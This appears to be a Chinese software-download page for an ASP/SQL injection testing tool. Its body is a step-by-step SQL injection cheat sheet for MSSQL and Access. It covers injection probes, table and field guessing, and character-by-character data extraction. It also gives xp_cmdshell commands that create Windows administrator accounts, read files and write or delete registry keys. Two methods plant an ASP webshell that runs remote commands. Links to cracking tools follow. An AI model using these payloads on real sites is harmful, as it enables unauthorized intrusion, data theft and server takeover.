本工具功能非常强大,希望同学们用于正途,别去做一些偷鸡摸狗的令人可耻的事情,由VB语言编写的网站漏洞检测工具的名称,ASP注入漏洞检测工具,特别在SQL Server注入检测方面有极高的准确率。1.判断是否有注入;and 1=1;and 1=22.初步判断是否是mssql;and user>03.判断数据库系统;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from msysobjects)>0 access4.注入参数是字符'and [查询条件] and ''='5.搜索时没过滤参数的'and [查询条件] and '%25'='6.猜数据库;and (Select Count(*) from [数据库名])>07.猜字段;and (Select Count(字段名) from 数据库名)>08.猜字段中记录长度;and (select top 1 len(字段名) from 数据库名)>09.(1)猜字段的ascii值(access);and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0(2)猜字段的ascii值(mssql);and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>010.测试权限结构(mssql);and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--;and 1=(SELECT IS_MEMBER('db_owner'));--11.添加mssql和系统的帐户;exec master.dbo.sp_addlogin username;--;exec master.dbo.sp_password null,username,password;--;exec master.dbo.sp_addsrvrolemember sysadminusername;--;exec master.dbo.xp_cmdshell 'net user usernamepassword /workstations:* /times:all/passwordchg:yes /passwordreq:yes /active:yes /add';--;exec master.dbo.xp_cmdshell 'net user usernamepassword /add';--;exec master.dbo.xp_cmdshell 'net localgroupadministrators username /add';--12.(1)遍历目录;create table dirs(paths varchar(100), id int);insert dirs exec master.dbo.xp_dirtree 'c:\';and (select top 1 paths from dirs)>0;and (select top 1 paths from dirs where paths notin('上步得到的paths'))>)(2)遍历目录;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树结构;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容13.mssql中的存储过程xp_regenumvalues 注册表根键, 子键;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值xp_regread 根键,子键,键值名;exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值xp_regwrite 根键,子键, 值名, 值类型, 值值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表xp_regdeletevalue 根键,子键,值名exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值14.mssql的backup创建webshelluse modelcreate table cmd(str image);insert into cmd(str) values ('<% Dim oScript %>');backup database model to disk='c:\l.asp';15.mssql内置函数;and (select @@version)>0 获得Windows的版本号;and user_name()='dbo' 判断当前系统的连接用户是不是sa;and (select user_name())>0 爆当前系统的连接用户;and (select db_name())>0 得到当前连接的数据库16.简洁的webshelluse modelcreate table cmd(str image);insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');backup database model to disk='g:\wwwtest\l.asp';请求的时候,像这样子用:http://ip/l.asp?c=dir
- PC官方版
- 安卓官方手机版
- IOS官方手机版
下载 
下载 
下载 
下载 
下载 
下载 
下载 
下载 
下载 
下载 
下载 
下载 
下载 
下载 
下载 
下载 
下载 
下载 
像这种工具用于安全检测,杀毒软件哪个不报毒。怕有毒你就不要下。 
加密狗读取工具(加密狗读狗工具文件)【共24
SecScan下载(SecScan保密检查软件)2016 最新
AppScan9.0.3.5官方安装包含破解补丁免费下
计算机系统保密检查工具V2.05破解版
QQ相册密码暴力破解器(直接查看加密的相册)
端口检测工具(检测指定范围的端口是否开启)
大势至USB监控器3.1 免费版
金山安全沙箱1.0.2 独立版
串口监听工具(串口监视器)1.0 绿色中文版
